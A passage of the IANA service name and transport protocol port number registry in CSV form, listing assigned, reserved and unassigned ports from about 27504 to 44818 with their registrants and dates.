Port,[Sten_H_Danielsen],[Sten_H_Danielsen],2002-07,,,,, kopek-httphead,27504,udp,Kopek HTTP Head Port,[Sten_H_Danielsen],[Sten_H_Danielsen],2002-07,,,,, ,27505-27781,,Unassigned,,,,,,,, ars-vista,27782,tcp,ARS VISTA Application,[Spencer_Teran_2],[Spencer_Teran_2],2004-11,,,,, ars-vista,27782,udp,ARS VISTA Application,[Spencer_Teran_2],[Spencer_Teran_2],2004-11,,,,, ,27783-27875,,Unassigned,,,,,,,, astrolink,27876,tcp,Astrolink Protocol,[Alanax_Technologies_Inc],[Wesley_Eddy],2013-01-14,,,,, ,27876,udp,Reserved,,,,,,,, ,27877-27998,,Unassigned,,,,,,,, tw-auth-key,27999,tcp,TW Authentication/Key Distribution and,[Alex_Duncan_2],[Alex_Duncan_2],,,,,, tw-auth-key,27999,udp,Attribute Certificate Services,[Alex_Duncan_2],[Alex_Duncan_2],,,,,, nxlmd,28000,tcp,NX License Manager,[Anthony_Greatorex],[Anthony_Greatorex],2004-11,,,,Unauthorized Use Known on port 28000, nxlmd,28000,udp,NX License Manager,[Anthony_Greatorex],[Anthony_Greatorex],2004-11,,,,, pqsp,28001,tcp,PQ Service,[Peter_Laschtowitz],[Peter_Laschtowitz],2009-09-15,,,,, ,28001,udp,Reserved,,,,,,,, ,28002-28118,,Unassigned,,,,,,,"Unauthorized Use Known on ports 28017, 28018 and 28019", ,28119,tcp,Reserved,,,,,,,, a27-ran-ran,28119,udp,A27 cdma2000 RAN Management,[ThreeGPP2],[Zhiming_Li],2012-04-13,,,,, ,28120-28199,,Unassigned,,,,,,,, voxelstorm,28200,tcp,VoxelStorm game server,[VoxelStorm],[Eugene_Hopkinson],2012-11-08,,,,, voxelstorm,28200,udp,VoxelStorm game server,[VoxelStorm],[Eugene_Hopkinson],2012-11-08,,,,, ,28201-28239,,Unassigned,,,,,,,, siemensgsm,28240,tcp,Siemens GSM,[David_Anuszewski],[David_Anuszewski],2004-11,,,,, siemensgsm,28240,udp,Siemens GSM,[David_Anuszewski],[David_Anuszewski],2004-11,,,,, ,28241-29117,,Unassigned,,,,,,,, ,29118,tcp,Reserved,,,,,,,, ,29118,udp,Reserved,,,,,,,, sgsap,29118,sctp,SGsAP in 3GPP,[GPP_Specifications],[GPP_Specifications],2009-06-11,,,,, ,29119-29166,,Unassigned,,,,,,,, otmp,29167,tcp,ObTools Message Protocol,[Paul_Clark],[Paul_Clark],2006-02,,,,, otmp,29167,udp,ObTools Message Protocol,[Paul_Clark],[Paul_Clark],2006-02,,,,, ,29168,tcp,Reserved,,,,,,,, ,29168,udp,Reserved,,,,,,,, sbcap,29168,sctp,SBcAP in 3GPP,[GPP_Specifications],[GPP_Specifications],2009-06-11,,,,, iuhsctpassoc,29169,sctp,HNBAP and RUA Common Association,[John_Meredith],[John_Meredith],2009-09-08,,,,, ,29170-29998,,Unassigned,,,,,,,, bingbang,29999,tcp,data exchange protocol for IEC61850 in wind power plants,[DEIF_AS],[Armin_Solies],2012-10-15,,,,, ,29999,udp,Reserved,,,,,,,, ndmps,30000,tcp,Secure Network Data Management Protocol,[Alioune_Thiam],[Alioune_Thiam],2013-02-05,,,,, ,30000,udp,Reserved,,,,,,,, pago-services1,30001,tcp,Pago Services 1,[Balduin_Mueller_Plat],[Balduin_Mueller_Plat],2002-03,,,,, pago-services1,30001,udp,Pago Services 1,[Balduin_Mueller_Plat],[Balduin_Mueller_Plat],2002-03,,,,, pago-services2,30002,tcp,Pago Services 2,[Balduin_Mueller_Plat],[Balduin_Mueller_Plat],2002-03,,,,, pago-services2,30002,udp,Pago Services 2,[Balduin_Mueller_Plat],[Balduin_Mueller_Plat],2002-03,,,,, amicon-fpsu-ra,30003,tcp,Amicon FPSU-IP Remote Administration,[Amicon_OOO],[Alexey_Novotorzhin],2013-04-25,,,,, amicon-fpsu-ra,30003,udp,Amicon FPSU-IP Remote Administration,[Amicon_OOO],[Alexey_Novotorzhin],2013-04-25,,,,, amicon-fpsu-s,30004,udp,Amicon FPSU-IP VPN,[Amicon_OOO],[Alexey_Novotorzhin],2013-04-25,,,,, ,30004,tcp,Reserved,,,,,,,, ,30005-30259,,Unassigned,,,,,,,, kingdomsonline,30260,tcp,Kingdoms Online (CraigAvenue),[Drake_Bankston],[Drake_Bankston],2009-08-18,,,,, kingdomsonline,30260,udp,Kingdoms Online (CraigAvenue),[Drake_Bankston],[Drake_Bankston],2009-08-18,,,,, ,30261-30831,,Unassigned,,,,,,,, samsung-disc,30832,udp,Samsung Convergence Discovery Protocol,[Samsung_2],[Young_Ki_Kim],2013-05-29,,,,, ,30832,tcp,Reserved,,,,,,,, ,30833-30998,,Unassigned,,,,,,,, ovobs,30999,tcp,OpenView Service Desk Client,[Service_Desk_Product],[Service_Desk_Product],2006-05,,,,, ovobs,30999,udp,OpenView Service Desk Client,[Service_Desk_Product],[Service_Desk_Product],2006-05,,,,, ,31000-31019,,Unassigned,,,,,,,, autotrac-acp,31020,tcp,Autotrac ACP 245,[Roberto_Jorge_Dino],[Roberto_Jorge_Dino],,,,,, ,31020,udp,Reserved,,,,,,,, ,31021-31028,,Unassigned,,,,,,,, ,31029,tcp,Reserved,,,,,,,, yawn,31029,udp,YaWN - Yet Another Windows Notifier,[David_Spivey],[David_Spivey],2010-08-30,,,,, ,31030-31399,,Unassigned,,,,,,,, pace-licensed,31400,tcp,PACE license server,[PACE_Anti-Piracy],[Allen_Cronce],2014-04-28,,,,, ,31400,udp,Reserved,,,,,,,, ,31401-31415,,Unassigned,,,,,,,, xqosd,31416,tcp,XQoS network monitor,[Joe_Elliott],[Joe_Elliott],2002-06,,,,, xqosd,31416,udp,XQoS network monitor,[Joe_Elliott],[Joe_Elliott],2002-06,,,,, ,31417-31456,,Unassigned,,,,,,,, tetrinet,31457,tcp,TetriNET Protocol,[Emmanuel_Bourg],[Emmanuel_Bourg],2004-11,,,,, tetrinet,31457,udp,TetriNET Protocol,[Emmanuel_Bourg],[Emmanuel_Bourg],2004-11,,,,, ,31458-31619,,Unassigned,,,,,,,, lm-mon,31620,tcp,lm mon,[System_Administrator],[System_Administrator],2003-06,,,,, lm-mon,31620,udp,lm mon,[System_Administrator],[System_Administrator],2003-06,,,,, ,31621-31684,,Unassigned,,,,,,,, dsx-monitor,31685,tcp,"DS Expert Monitor IANA assigned this well-formed service name as a replacement for ""dsx_monitor"".",[John_Lowery],[John_Lowery],2008-08-21,,,,, dsx_monitor,31685,tcp,DS Expert Monitor,[John_Lowery],[John_Lowery],2008-08-21,,,,,"This entry is an alias to ""dsx-monitor"". This entry is now historic, not usable for use with many common service discovery mechanisms." ,31685,udp,Reserved,,,,,,,, ,31686-31764,,Unassigned,,,,,,,, gamesmith-port,31765,tcp,GameSmith Port,[Randy_Thompson],[Randy_Thompson],2002-08,,,,, gamesmith-port,31765,udp,GameSmith Port,[Randy_Thompson],[Randy_Thompson],2002-08,,,,, ,31766-31947,,Unassigned,,,,,,,, iceedcp-tx,31948,tcp,"Embedded Device Configuration Protocol TX IANA assigned this well-formed service name as a replacement for ""iceedcp_tx"".",[Oliver_Lewis],[Oliver_Lewis],2006-08,,,,, iceedcp_tx,31948,tcp,Embedded Device Configuration Protocol TX,[Oliver_Lewis],[Oliver_Lewis],2006-08,,,,,"This entry is an alias to ""iceedcp-tx"". This entry is now historic, not usable for use with many common service discovery mechanisms." iceedcp-tx,31948,udp,"Embedded Device Configuration Protocol TX IANA assigned this well-formed service name as a replacement for ""iceedcp_tx"".",[Oliver_Lewis],[Oliver_Lewis],2006-08,,,,, iceedcp_tx,31948,udp,Embedded Device Configuration Protocol TX,[Oliver_Lewis],[Oliver_Lewis],2006-08,,,,,"This entry is an alias to ""iceedcp-tx"". This entry is now historic, not usable for use with many common service discovery mechanisms." iceedcp-rx,31949,tcp,"Embedded Device Configuration Protocol RX IANA assigned this well-formed service name as a replacement for ""iceedcp_rx"".",[Oliver_Lewis],[Oliver_Lewis],2006-08,,,,, iceedcp_rx,31949,tcp,Embedded Device Configuration Protocol RX,[Oliver_Lewis],[Oliver_Lewis],2006-08,,,,,"This entry is an alias to ""iceedcp-rx"". This entry is now historic, not usable for use with many common service discovery mechanisms." iceedcp-rx,31949,udp,"Embedded Device Configuration Protocol RX IANA assigned this well-formed service name as a replacement for ""iceedcp_rx"".",[Oliver_Lewis],[Oliver_Lewis],2006-08,,,,, iceedcp_rx,31949,udp,Embedded Device Configuration Protocol RX,[Oliver_Lewis],[Oliver_Lewis],2006-08,,,,,"This entry is an alias to ""iceedcp-rx"". This entry is now historic, not usable for use with many common service discovery mechanisms." ,31950-32033,,Unassigned,,,,,,,, iracinghelper,32034,tcp,iRacing helper service,[Randy_Cassidy],[Randy_Cassidy],2007-08-30,,,,, iracinghelper,32034,udp,iRacing helper service,[Randy_Cassidy],[Randy_Cassidy],2007-08-30,,,,, ,32035-32248,,Unassigned,,,,,,,, t1distproc60,32249,tcp,T1 Distributed Processor,[Peter_Beahan],[Peter_Beahan],2004-11,,,,, t1distproc60,32249,udp,T1 Distributed Processor,[Peter_Beahan],[Peter_Beahan],2004-11,,,,, ,32250-32482,,Unassigned,,,,,,,, apm-link,32483,tcp,Access Point Manager Link,[Tony_Diodato],[Tony_Diodato],2005-08,,,,, apm-link,32483,udp,Access Point Manager Link,[Tony_Diodato],[Tony_Diodato],2005-08,,,,, ,32484-32634,,Unassigned,,,,,,,, sec-ntb-clnt,32635,tcp,SecureNotebook-CLNT,[Eric_Cantineau],[Eric_Cantineau],2004-11,,,,, sec-ntb-clnt,32635,udp,SecureNotebook-CLNT,[Eric_Cantineau],[Eric_Cantineau],2004-11,,,,, DMExpress,32636,tcp,DMExpress,[Arnie_Farrelly],[Arnie_Farrelly],,,,,, DMExpress,32636,udp,DMExpress,[Arnie_Farrelly],[Arnie_Farrelly],,,,,, ,32637-32766,,Unassigned,,,,,,,, filenet-powsrm,32767,tcp,FileNet BPM WS-ReliableMessaging Client,[Chris_Adkins],[Chris_Adkins],2006-08,,,,, filenet-powsrm,32767,udp,FileNet BPM WS-ReliableMessaging Client,[Chris_Adkins],[Chris_Adkins],2006-08,,,,, filenet-tms,32768,tcp,Filenet TMS,[Daniel_Whelan],[Daniel_Whelan],,,,,, filenet-tms,32768,udp,Filenet TMS,[Daniel_Whelan],[Daniel_Whelan],,,,,, filenet-rpc,32769,tcp,Filenet RPC,[Daniel_Whelan],[Daniel_Whelan],,,,,, filenet-rpc,32769,udp,Filenet RPC,[Daniel_Whelan],[Daniel_Whelan],,,,,, filenet-nch,32770,tcp,Filenet NCH,[Daniel_Whelan],[Daniel_Whelan],,,,,, filenet-nch,32770,udp,Filenet NCH,[Daniel_Whelan],[Daniel_Whelan],,,,,, filenet-rmi,32771,tcp,FileNET RMI,[Chris_Adkins],[Chris_Adkins],,,,,, filenet-rmi,32771,udp,FileNet RMI,[Chris_Adkins],[Chris_Adkins],,,,,, filenet-pa,32772,tcp,FileNET Process Analyzer,[Chris_Adkins],[Chris_Adkins],2003-01,,,,, filenet-pa,32772,udp,FileNET Process Analyzer,[Chris_Adkins],[Chris_Adkins],2003-01,,,,, filenet-cm,32773,tcp,FileNET Component Manager,[Chris_Adkins],[Chris_Adkins],2003-08,,,,, filenet-cm,32773,udp,FileNET Component Manager,[Chris_Adkins],[Chris_Adkins],2003-08,,,,, filenet-re,32774,tcp,FileNET Rules Engine,[Chris_Adkins],[Chris_Adkins],2003-08,,,,, filenet-re,32774,udp,FileNET Rules Engine,[Chris_Adkins],[Chris_Adkins],2003-08,,,,, filenet-pch,32775,tcp,Performance Clearinghouse,[Tim_Morgan_2],[Tim_Morgan_2],2005-11,,,,, filenet-pch,32775,udp,Performance Clearinghouse,[Tim_Morgan_2],[Tim_Morgan_2],2005-11,,,,, filenet-peior,32776,tcp,FileNET BPM IOR,[Chris_Adkins],[Chris_Adkins],2006-05,,,,, filenet-peior,32776,udp,FileNET BPM IOR,[Chris_Adkins],[Chris_Adkins],2006-05,,,,, filenet-obrok,32777,tcp,FileNet BPM CORBA,[Chris_Adkins],[Chris_Adkins],2006-10,,,,, filenet-obrok,32777,udp,FileNet BPM CORBA,[Chris_Adkins],[Chris_Adkins],2006-10,,,,, ,32778-32800,,Unassigned,,,,,,,, mlsn,32801,tcp,Multiple Listing Service Network,[Corey_Leong],[Corey_Leong],2010-10-11,,,,, mlsn,32801,udp,Multiple Listing Service Network,[Corey_Leong],[Corey_Leong],2010-10-11,,,,, ,32802-32810,,Unassigned,,,,,,,, retp,32811,tcp,Real Estate Transport Protocol,[Corey_Leong],[Corey_Leong],2010-10-11,,,,, ,32811,udp,Reserved,,,,,,,, ,32812-32895,,Unassigned,,,,,,,, idmgratm,32896,tcp,Attachmate ID Manager,[George_Gianelos_2],[George_Gianelos_2],2003-03,,,,, idmgratm,32896,udp,Attachmate ID Manager,[George_Gianelos_2],[George_Gianelos_2],2003-03,,,,, ,32897-33122,,Unassigned,,,,,,,, aurora-balaena,33123,tcp,Aurora (Balaena Ltd),[Andrew_Mather],[Andrew_Mather],2008-02-14,,,,, aurora-balaena,33123,udp,Aurora (Balaena Ltd),[Andrew_Mather],[Andrew_Mather],2008-02-14,,,,, ,33124-33330,,Unassigned,,,,,,,, diamondport,33331,tcp,DiamondCentral Interface,[Edward_Browdy],[Edward_Browdy],2002-07,,,,, diamondport,33331,udp,DiamondCentral Interface,[Edward_Browdy],[Edward_Browdy],2002-07,,,,, ,33332,,Unassigned,,,,,,,, dgi-serv,33333,tcp,Digital Gaslight Service,[George_Flanagin],[George_Flanagin],2010-03-02,,,,, ,33333,udp,Reserved,,,,,,,, speedtrace,33334,tcp,SpeedTrace TraceAgent,[Holger_Heinrich],[Holger_Heinrich],2012-02-01,,,,, speedtrace-disc,33334,udp,SpeedTrace TraceAgent Discovery,[Holger_Heinrich],[Holger_Heinrich],2012-02-01,,,,, ,33335-33433,,Unassigned,,,,,,,, traceroute,33434,tcp,traceroute use,[IANA],[IANA],,,,,, traceroute,33434,udp,traceroute use,[IANA],[IANA],,,,,, ,33435-33655,,Unassigned,,,,,,,, snip-slave,33656,tcp,SNIP Slave,[Dr_Chris_Tucker],[Dr_Chris_Tucker],2005-08,,,,, snip-slave,33656,udp,SNIP Slave,[Dr_Chris_Tucker],[Dr_Chris_Tucker],2005-08,,,,, ,33657-34248,,Unassigned,,,,,,,, turbonote-2,34249,tcp,TurboNote Relay Server Default Port,[Peter_Hyde],[Peter_Hyde],,,,,, turbonote-2,34249,udp,TurboNote Relay Server Default Port,[Peter_Hyde],[Peter_Hyde],,,,,, ,34250-34377,,Unassigned,,,,,,,, p-net-local,34378,tcp,P-Net on IP local,[Kurt_Nissen],[Kurt_Nissen],2004-02,,,,, p-net-local,34378,udp,P-Net on IP local,[Kurt_Nissen],[Kurt_Nissen],2004-02,,,,, p-net-remote,34379,tcp,P-Net on IP remote,[Kurt_Nissen],[Kurt_Nissen],2004-02,,,,, p-net-remote,34379,udp,P-Net on IP remote,[Kurt_Nissen],[Kurt_Nissen],2004-02,,,,, ,34380-34566,,Unassigned,,,,,,,, dhanalakshmi,34567,tcp,dhanalakshmi.org EDI Service,[Girish_Gopalakrishna],[Girish_Gopalakrishna],2010-04-20,,,,, ,34567,udp,Reserved,,,,,,,, ,34568-34961,,Unassigned,,,,,,,, profinet-rt,34962,tcp,PROFInet RT Unicast,[Peter_Wenzel],[Peter_Wenzel],2004-11,,,,, profinet-rt,34962,udp,PROFInet RT Unicast,[Peter_Wenzel],[Peter_Wenzel],2004-11,,,,, profinet-rtm,34963,tcp,PROFInet RT Multicast,[Peter_Wenzel],[Peter_Wenzel],2004-11,,,,, profinet-rtm,34963,udp,PROFInet RT Multicast,[Peter_Wenzel],[Peter_Wenzel],2004-11,,,,, profinet-cm,34964,tcp,PROFInet Context Manager,[Peter_Wenzel],[Peter_Wenzel],2004-11,,,,, profinet-cm,34964,udp,PROFInet Context Manager,[Peter_Wenzel],[Peter_Wenzel],2004-11,,,,, ,34965-34979,,Unassigned,,,,,,,, ethercat,34980,tcp,EtherCAT Port,[Martin_Rostan],[Martin_Rostan],2003-11,,,,, ethercat,34980,udp,EhterCAT Port,[Martin_Rostan],[Martin_Rostan],2003-11,,,,, ,34981-34999,,Unassigned,,,,,,,, heathview,35000,tcp,HeathView,[Heathwest_Systems_Limited],[Andrew_Porrer],2013-03-21,,,,, ,35000,udp,Reserved,,,,,,,, rt-viewer,35001,tcp,ReadyTech Viewer,[ReadyTech_Corporation],[Kevin_Woodward],2013-09-13,,,,, rt-viewer,35001,udp,ReadyTech Viewer,[ReadyTech_Corporation],[Kevin_Woodward],2013-09-13,,,,, rt-sound,35002,tcp,ReadyTech Sound Server,[ReadyTech_Corporation],[Kevin_Woodward],2013-09-13,,,,, ,35002,udp,Reserved,,,,,,,, rt-devicemapper,35003,tcp,ReadyTech DeviceMapper Server,[ReadyTech_Corporation],[Kevin_Woodward],2013-09-13,,,,, ,35003,udp,Reserved,,,,,,,, rt-classmanager,35004,tcp,ReadyTech ClassManager,[ReadyTech_Corporation],[Kevin_Woodward],2013-09-13,,,,, rt-classmanager,35004,udp,ReadyTech ClassManager,[ReadyTech_Corporation],[Kevin_Woodward],2013-09-13,,,,, rt-labtracker,35005,tcp,ReadyTech LabTracker,[ReadyTech_Corporation],[Kevin_Woodward],2013-09-13,,,,, ,35005,udp,Reserved,,,,,,,, rt-helper,35006,tcp,ReadyTech Helper Service,[ReadyTech_Corporation],[Kevin_Woodward],2013-09-13,,,,, ,35006,udp,Reserved,,,,,,,, ,35007-35353,,Unassigned,,,,,,,, kitim,35354,tcp,KIT Messenger,[Rudi_Visser],[Rudi_Visser],2011-07-07,,,,, ,35354,udp,Reserved,,,,,,,, altova-lm,35355,tcp,Altova License Management,[Alexander_Falk_2],[Alexander_Falk_2],2011-07-07,,,,, altova-lm-disc,35355,udp,Altova License Management Discovery,[Alexander_Falk_2],[Alexander_Falk_2],2011-07-07,,,,, guttersnex,35356,tcp,Gutters Note Exchange,[Squee_Application_Development],[Tristan_Seifert_2],2011-07-19,,,,, ,35356,udp,Reserved,,,,,,,, openstack-id,35357,tcp,OpenStack ID Service,[Rackspace_Hosting],[Ziad_Sawalha],2011-08-15,,,,, ,35357,udp,Reserved,,,,,,,, ,35358-36000,,Unassigned,,,,,,,, allpeers,36001,tcp,AllPeers Network,[Cedric_Maloux],[Cedric_Maloux],2007-04,,,,, allpeers,36001,udp,AllPeers Network,[Cedric_Maloux],[Cedric_Maloux],2007-04,,,,, ,36002-36411,,Unassigned,,,,,,,, ,36412,tcp,Reserved,,,,,,,, ,36412,udp,Reserved,,,,,,,, s1-control,36412,sctp,S1-Control Plane (3GPP),[Kimmo_Kymalainen],[Kimmo_Kymalainen],2009-09-01,,,,, ,36413-36421,,Unassigned,,,,,,,, ,36422,tcp,Reserved,,,,,,,, ,36422,udp,Reserved,,,,,,,, x2-control,36422,sctp,X2-Control Plane (3GPP),[Kimmo_Kymalainen],[Kimmo_Kymalainen],2009-09-01,,,,, ,36423-36442,,Unassigned,,,,,,,, m2ap,36443,sctp,M2 Application Part,[Dario_S_Tonesi],[Dario_S_Tonesi],2011-02-07,,,,, m3ap,36444,sctp,M3 Application Part,[Dario_S_Tonesi],[Dario_S_Tonesi],2011-02-07,,,,, ,36445-36523,,Unassigned,,,,,,,, febooti-aw,36524,tcp,Febooti Automation Workshop,[Maris_Bormanis],[Maris_Bormanis],2011-06-10,,,,, ,36524,udp,Reserved,,,,,,,, ,36525-36601,,Unassigned,,,,,,,, observium-agent,36602,tcp,Observium statistics collection agent,[Observium],[Adam_Armstrong],2013-05-10,,,,, ,36602,udp,Reserved,,,,,,,, ,36603-36864,,Unassigned,,,,,,,, kastenxpipe,36865,tcp,KastenX Pipe,[Guy_Cheng],[Guy_Cheng],,,,,, kastenxpipe,36865,udp,KastenX Pipe,[Guy_Cheng],[Guy_Cheng],,,,,, ,36866-37474,,Unassigned,,,,,,,, neckar,37475,tcp,science + computing's Venus Administration Port,[Ralf_Allrutz],[Ralf_Allrutz],2002-02,,,,, neckar,37475,udp,science + computing's Venus Administration Port,[Ralf_Allrutz],[Ralf_Allrutz],2002-02,,,,, ,37476-37482,,Unassigned,,,,,,,, gdrive-sync,37483,tcp,Google Drive Sync,[Google],[Fil_Zembowicz],2013-02-01,,,,, ,37483,udp,Reserved,,,,,,,, ,37484-37653,,Unassigned,,,,,,,, unisys-eportal,37654,tcp,Unisys ClearPath ePortal,[Sung_U_Ro],[Sung_U_Ro],2006-01,,,,, unisys-eportal,37654,udp,Unisys ClearPath ePortal,[Sung_U_Ro],[Sung_U_Ro],2006-01,,,,, ,37655-37999,,Unassigned,,,,,,,, ivs-database,38000,tcp,InfoVista Server Database,[InfoVista],[Sebastien_Bouchex_Bellomie],2014-05-23,,,,, ,38000,udp,Reserved,,,,,,,, ivs-insertion,38001,tcp,InfoVista Server Insertion,[InfoVista],[Sebastien_Bouchex_Bellomie],2014-05-23,,,,, ,38001,udp,Reserved,,,,,,,, ,38002-38200,,Unassigned,,,,,,,, galaxy7-data,38201,tcp,Galaxy7 Data Tunnel,[Tatham_Oddie],[Tatham_Oddie],2002-09,,,,, galaxy7-data,38201,udp,Galaxy7 Data Tunnel,[Tatham_Oddie],[Tatham_Oddie],2002-09,,,,, fairview,38202,tcp,Fairview Message Service,[Jim_Lyle],[Jim_Lyle],2005-11,,,,,"Defined TXT keys: DevID=, DevType=, DevStat=" fairview,38202,udp,Fairview Message Service,[Jim_Lyle],[Jim_Lyle],2005-11,,,,,"Defined TXT keys: DevID=, DevType=, DevStat=" agpolicy,38203,tcp,AppGate Policy Server,[Martin_Forssen],[Martin_Forssen],2004-11,,,,, agpolicy,38203,udp,AppGate Policy Server,[Martin_Forssen],[Martin_Forssen],2004-11,,,,, ,38204-38799,,Unassigned,,,,,,,, sruth,38800,tcp,"Sruth is a service for the distribution of routinely- generated but arbitrary files based on a publish/subscribe distribution model and implemented using a peer-to-peer transport mechanism",[University_Corporation_for_Atmospheric_Research],[Steven_Emmerson],2012-05-07,,,,, ,38800,udp,Reserved,,,,,,,, ,38801-38864,,Unassigned,,,,,,,, secrmmsafecopya,38865,tcp,Security approval process for use of the secRMM SafeCopy program,[Squadra_Technologies],[Anthony_LaMark],2012-03-14,,,,, ,38865,udp,Reserved,,,,,,,, ,38866-39680,,Unassigned,,,,,,,, turbonote-1,39681,tcp,TurboNote Default Port,[Peter_Hyde],[Peter_Hyde],,,,,, turbonote-1,39681,udp,TurboNote Default Port,[Peter_Hyde],[Peter_Hyde],,,,,, ,39682-39999,,Unassigned,,,,,,,, safetynetp,40000,tcp,SafetyNET p,[Roland_Rupp],[Roland_Rupp],2006-11,,,,, safetynetp,40000,udp,SafetyNET p,[Roland_Rupp],[Roland_Rupp],2006-11,,,,, ,40001-40403,,Unassigned,,,,,,,, sptx,40404,tcp,Simplify Printing TX,[Tricerat],[Eric_Musgrave],2013-12-09,,,,, ,40404,udp,Reserved,,,,,,,, ,40405-40840,,Unassigned,,,,,,,, cscp,40841,tcp,CSCP,[Michael_Dodge],[Michael_Dodge],,,,,, cscp,40841,udp,CSCP,[Michael_Dodge],[Michael_Dodge],,,,,, csccredir,40842,tcp,CSCCREDIR,[Sudhir_Menon],[Sudhir_Menon],,,,,, csccredir,40842,udp,CSCCREDIR,[Sudhir_Menon],[Sudhir_Menon],,,,,, csccfirewall,40843,tcp,CSCCFIREWALL,[Sudhir_Menon],[Sudhir_Menon],,,,,, csccfirewall,40843,udp,CSCCFIREWALL,[Sudhir_Menon],[Sudhir_Menon],,,,,, ,40844-40852,,Unassigned,,,,,,,, ,40853,tcp,Reserved,,,,,,,, ortec-disc,40853,udp,ORTEC Service Discovery,[Jesse_Ursery],[Jesse_Ursery],2010-11-22,,,,, ,40854-41110,,Unassigned,,,,,,,, fs-qos,41111,tcp,Foursticks QoS Protocol,[Chee_Kent_Lam],[Chee_Kent_Lam],2002-04,,,,, fs-qos,41111,udp,Foursticks QoS Protocol,[Chee_Kent_Lam],[Chee_Kent_Lam],2002-04,,,,, ,41112-41120,,Unassigned,,,,,,,, tentacle,41121,tcp,Tentacle Server,[Sancho_Lerena],[Sancho_Lerena],2009-06-02,,,,, ,41121,udp,Reserved,,,,,,,, ,41122-41793,,Unassigned,,,,,,,, crestron-cip,41794,tcp,Crestron Control Port,[Ed_Ranney],[Ed_Ranney],2003-01,,,,, crestron-cip,41794,udp,Crestron Control Port,[Ed_Ranney],[Ed_Ranney],2003-01,,,,, crestron-ctp,41795,tcp,Crestron Terminal Port,[Ed_Ranney],[Ed_Ranney],2003-01,,,,, crestron-ctp,41795,udp,Crestron Terminal Port,[Ed_Ranney],[Ed_Ranney],2003-01,,,,, crestron-cips,41796,tcp,Crestron Secure Control Port,[Crestron_Electronics],[Manish_Talreja],2012-06-27,,,,, ,41796,udp,Reserved,,,,,,,, crestron-ctps,41797,tcp,Crestron Secure Terminal Port,[Crestron_Electronics],[Manish_Talreja],2012-06-27,,,,, ,41797,udp,Reserved,,,,,,,, ,41798-42507,,Unassigned,,,,,,,Unauthorized Use Known on port 42000, candp,42508,tcp,Computer Associates network discovery protocol,[Jon_Press],[Jon_Press],2005-09,,,,, candp,42508,udp,Computer Associates network discovery protocol,[Jon_Press],[Jon_Press],2005-09,,,,, candrp,42509,tcp,CA discovery response,[Jon_Press],[Jon_Press],2005-08,,,,, candrp,42509,udp,CA discovery response,[Jon_Press],[Jon_Press],2005-08,,,,, caerpc,42510,tcp,CA eTrust RPC,[Jon_Press],[Jon_Press],2005-08,,,,, caerpc,42510,udp,CA eTrust RPC,[Jon_Press],[Jon_Press],2005-08,,,,, ,42511-42999,,Unassigned,,,,,,,, recvr-rc,43000,tcp,Receiver Remote Control,[Research_Electronics_International],[Ross_Binkley],2012-12-20,,,,, recvr-rc-disc,43000,udp,Receiver Remote Control Discovery,[Research_Electronics_International],[Ross_Binkley],2012-12-20,,,,, ,43001-43187,,Unassigned,,,,,,,, reachout,43188,tcp,REACHOUT,[Roman_Kriis],[Roman_Kriis],,,,,, reachout,43188,udp,REACHOUT,[Roman_Kriis],[Roman_Kriis],,,,,, ndm-agent-port,43189,tcp,NDM-AGENT-PORT,[Roman_Kriis],[Roman_Kriis],,,,,, ndm-agent-port,43189,udp,NDM-AGENT-PORT,[Roman_Kriis],[Roman_Kriis],,,,,, ip-provision,43190,tcp,IP-PROVISION,[Roman_Kriis],[Roman_Kriis],,,,,, ip-provision,43190,udp,IP-PROVISION,[Roman_Kriis],[Roman_Kriis],,,,,, noit-transport,43191,tcp,Reconnoiter Agent Data Transport,[Theo_Schlossnagle],[Theo_Schlossnagle],2009-05-19,,,,, ,43191,udp,Reserved,,,,,,,, ,43192-43209,,Unassigned,,,,,,,, shaperai,43210,tcp,Shaper Automation Server Management,[Shaper_Automation],[Yohann_Sulaiman],2012-06-22,,,,, shaperai-disc,43210,udp,Shaper Automation Server Management Discovery,[Shaper_Automation],[Yohann_Sulaiman],2012-06-22,,,,, ,43211-43438,,Unassigned,,,,,,,, eq3-update,43439,tcp,EQ3 firmware update,[eQ-3_Entwicklung_GmbH],[Tido_de_Vries],2012-02-10,2014-05-09,,,, eq3-config,43439,udp,EQ3 discovery and configuration,[eQ-3_Entwicklung_GmbH],[Tido_de_Vries],2012-02-10,2014-05-09,,,, ew-mgmt,43440,tcp,Cisco EnergyWise Management,,,,,,,, ew-disc-cmd,43440,udp,Cisco EnergyWise Discovery and Command Flooding,[John_Parello],[John_Parello],2009-05-19,,,,, ciscocsdb,43441,tcp,Cisco NetMgmt DB Ports,[Cisco_Systems],[Cisco_Systems],2005-11,,,,, ciscocsdb,43441,udp,Cisco NetMgmt DB Ports,[Cisco_Systems],[Cisco_Systems],2005-11,,,,, ,43442-44122,,Unassigned,,,,,,,, z-wave-s,44123,tcp,Z-Wave Secure Tunnel,[Sigma_Designs_Inc],[Anders_Brandt_3],2012-10-12,,,,, ,44123,udp,Reserved,,,,,,,, ,43124-44320,,Unassigned,,,,,,,, pmcd,44321,tcp,PCP server (pmcd),[Ken_McDonell],[Ken_McDonell],2010-12-20,,,,, pmcd,44321,udp,PCP server (pmcd),[Ken_McDonell],[Ken_McDonell],2010-12-20,,,,, pmcdproxy,44322,tcp,PCP server (pmcd) proxy,[Ken_McDonell],[Ken_McDonell],2003-07,2010-12-20,,,, pmcdproxy,44322,udp,PCP server (pmcd) proxy,[Ken_McDonell],[Ken_McDonell],2003-07,2010-12-20,,,, pmwebapi,44323,tcp,HTTP binding for Performance Co-Pilot client API,[Performance_Co-Pilot_PCP_Project],[Ken_McDonell_2],2013-10-09,,,,, ,44323,udp,Unassigned,,,,,,,,"""pcp"" assignment withdrawn, moved to port 5351 per RFC6887" ,44324-44443,,Unassigned,,,,,,,, cognex-dataman,44444,tcp,Cognex DataMan Management Protocol,[Cognex],[Mario_Joussen],2012-08-28,,,,, ,44444,udp,Reserved,,,,,,,, ,44445-44543,,Unassigned,,,,,,,Known UNAUTHORIZED USE: Ports 44515 & 44516, ,44544,tcp,Reserved,,,,,,,, domiq,44544,udp,DOMIQ Building Automation,[DOMIQ_Sp_zoo],[Filip_Zawadiak],2011-08-29,,,,, ,44545-44552,,Unassigned,,,,,,,, rbr-debug,44553,tcp,REALbasic Remote Debug,[Aaron_Ballman],[Aaron_Ballman],2004-11,,,,, rbr-debug,44553,udp,REALbasic Remote Debug,[Aaron_Ballman],[Aaron_Ballman],2004-11,,,,, ,44554-44599,,Unassigned,,,,,,,, ,44600,tcp,Reserved,,,,,,,, asihpi,44600,udp,AudioScience HPI,[Eliot_Blennerhassett],[Eliot_Blennerhassett],2011-07-07,,,,, ,44601-44817,,Unassigned,,,,,,,, EtherNet-IP-2,44818,tcp,"EtherNet/IP messaging IANA 